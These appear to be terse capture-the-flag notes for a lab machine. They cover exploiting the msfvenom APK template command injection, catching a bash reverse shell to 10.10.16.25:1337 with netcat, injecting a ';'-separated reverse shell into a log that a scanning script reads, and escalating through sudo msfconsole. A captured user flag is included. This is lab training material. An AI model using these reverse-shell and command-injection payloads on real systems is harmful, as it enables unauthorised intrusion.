22/ssh 5000/http ![[Pasted image 20210416211309.png]]
Visiting 10.10.10.226:5000 ![[Pasted image 20210416211429.png]]
This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x
https://www.exploit-db.com/exploits/49491
nc -nvlp 1337
payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"'
![[Pasted image 20210416211608.png]]
user flag: c3728a7c05e95bb566784da579a2c887
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
vim /home/kid/hacker
t t 127.0.0.1; touch hhh.txt;
insert ";" into searchsploit user input
t t 127.0.0.1;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1'; >> hacker
![[Pasted image 20210416235654.png]]
![[Pasted image 20210416235635.png]]
Ease priv esc metasploit's msfconsole allows you to execute system commands within the msfconsole sudo /opt/metasploit-framework-6.0.9/msfconsole
![[Pasted image 20210416235933.png]]